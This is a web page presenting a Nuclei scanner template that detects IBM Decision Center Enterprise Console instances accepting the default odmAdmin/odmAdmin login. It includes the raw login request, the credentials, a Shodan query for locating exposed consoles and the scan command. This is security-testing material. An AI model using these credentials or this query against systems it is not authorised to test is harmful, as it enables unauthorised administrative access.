IBM Decision Center Enterprise Console - Default Login

ID: ibm-dcec-default-login

Severity: high

Author: DhiyaneshDK

Tags: ibm,default-login,decision-center

Description

YAML Source

id: ibm-dcec-default-login

info:
  name: IBM Decision Center Enterprise Console - Default Login
  author: DhiyaneshDK
  severity: high
  reference:
    - https://www.ibm.com/docs/en/odm/8.5.1?topic=console-tutorial-getting-started-decision-center-enterprise
  metadata:
    verified: true
    max-request: 1
    shodan-query: "html=\"Decision Center Enterprise console\""
  tags: ibm,default-login,decision-center

http:
  - raw:
      - |
        POST /teamserver/j_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}

    host-redirects: true
    max-redirects: 3

    attack: pitchfork
    payloads:
      username:
        - odmAdmin
      password:
        - odmAdmin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Current action:"
          - "Sign Out"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402202c439ffea872d81ee2a7f9ab8a913a2443c46a6ac5bc07ded744be1eab9eacd502204f3f2a6786315c4dfb2ff65ea82eb2c6df1587478d850a133449675d27b5c45a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/default-logins/ibm/ibm-dcec-default-login.yaml"

View on Github